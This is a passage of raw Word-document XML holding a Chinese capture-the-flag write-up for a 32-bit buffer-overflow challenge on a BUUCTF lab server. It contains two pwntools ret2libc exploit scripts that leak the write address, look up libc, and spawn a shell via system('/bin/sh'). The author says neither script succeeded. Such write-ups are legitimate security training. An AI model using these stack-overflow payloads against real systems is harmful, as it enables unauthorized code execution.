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4109" w14:textId="20A328A8" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00592F5B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  <w:r w:rsidRPr="00592F5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AABE383" wp14:editId="698FB255">
            <wp:extent cx="5124450" cy="2063750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="188556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D6F0" w14:textId="15E8579A" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00592F5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放到32位ida看一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00592F5B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41B5359C" wp14:editId="20519D13">
            <wp:extent cx="5274310" cy="917575"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="193525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76BE" w14:textId="1E20C5E2" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00592F5B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00592F5B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A543A8D" wp14:editId="2B104A15">
            <wp:extent cx="5274310" cy="1499870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1632723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23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5CB7" w14:textId="2ACEA150" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00592F5B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shift+f12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6741428F" w14:textId="48D313B2" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00592F5B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00592F5B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64A7803C" wp14:editId="6352680A">
            <wp:extent cx="5274310" cy="1722120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="57641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2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D6C3" w14:textId="6FD61D4C" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00592F5B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有什么有用的函数，所以我想到的是用libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12745076" w14:textId="131AC0C0" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00592F5B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C1B5A5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79625467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 *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4CEEF9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3E78B487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p = remote("node5.buuoj.cn", 25588)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B2725D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elf = ELF("pwn")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DA3306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74E453D4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write_plt = elf.plt["write"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7670E65F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write_got = elf.got["write"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442BC2D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main = elf.sym["main"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F39F950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1E1E72A4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p.recvuntil(b"Input:\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1120CBBB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323489B8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offset = 0x88+4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249427F2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payload1 = b"A" * offset + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD290E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73ACFC7D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p.sendline(payload1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5F31A8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3500E9C0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write_addr = u32(p.recvuntil(b"\x7f")[-4:].ljust(4, b"\x00"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F143DEB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4698520A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libc = LibcSearcher("write", write_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C90123D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libc_base = write_addr - libc.dump("write")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E188860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system_addr = libc_base + libc.dump("system")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E349907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bin_sh_addr = libc_base + libc.dump("str_bin_sh")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF6654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3F65749D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p.recvuntil(b"Input:\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32378B8B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17F12B8A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payload2 = b"A" * offset + p32(system_addr) + p32(main) + p32(bin_sh_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A201105" w14:textId="77777777" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00592F5B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B39B605" w14:textId="77777777" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00592F5B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p.sendline(payload2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E5F4C" w14:textId="5008C96A" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00592F5B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CBCFDF" w14:textId="1CA21832" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00592F5B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是打不进去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DE926" w14:textId="1EE020EC" w:rsidR="00592F5B" w:rsidRDefault="00592F5B" w:rsidP="00A154A1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下别人的做法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65EEF4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2D8CE0C8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 *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10981FD7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370A4403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p = remote("node5.buuoj.cn", 25588)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDFF6D1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elf = ELF("pwn")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0C6D97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6DD52680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write_plt = elf.plt["write"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2532E507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write_got = elf.got["write"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C890002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main = elf.sym["main"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED204A0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7A0834EE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p.recvuntil(b"Input:\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E38141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5DE25894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offset = 0x88 + 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D07EC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24D5C0A1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# 修正：使用b'a'而不是'a'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374B9670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payload1 = b"A" * offset + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D71822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7BC5BB32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p.sendline(payload1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAB6E1D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2AAC3F9B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write_addr = u32(p.recvuntil(b"\x7f")[-4:].ljust(4, b"\x00"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D10D488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79B63A39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libc = LibcSearcher("write", write_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE48E39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libc_base = write_addr - libc.dump("write")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013101BE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system_addr = libc_base + libc.dump("system")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501C921E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bin_sh_addr = libc_base + libc.dump("str_bin_sh")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731E564C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6DE19F43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p.recvuntil(b"Input:\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A7BEB6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554BF8D9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# 同样修正第二个payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E968787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payload2 = b"A" * offset + p32(system_addr) + p32(main) + p32(bin_sh_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDA390F" w14:textId="77777777" w:rsidR="00A154A1" w:rsidRDefault="00A154A1" w:rsidP="00A154A1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CBC753" w14:textId="77777777" w:rsidR="00A154A1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p.sendline(payload2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B89C1E3" w14:textId="01AA6A96" w:rsidR="00A154A1" w:rsidRDefault="00A154A1" w:rsidP="00A154A1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6497072F" w14:textId="166B137A" w:rsidR="00A154A1" w:rsidRPr="00592F5B" w:rsidRDefault="00A154A1" w:rsidP="00A154A1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其实感觉大差不差，反正两个都打不进去</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A154A1" w:rsidRPr="00592F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06E86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FF67C7C"/>
    <w:lvl w:ilvl="0" w:tplc="6F7C7B1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705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5B"/>
    <w:rsid w:val="00592F5B"/>
    <w:rsid w:val="00A154A1"/>
    <w:rsid w:val="00F9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8480"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FA177BC7-D81A-41E3-AFF2-1038B256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2F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F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F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F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F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F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F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2F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2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2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2F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2F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2F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2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2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2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2F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2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2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F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2F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2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2025-08-28T08:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-28T09:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>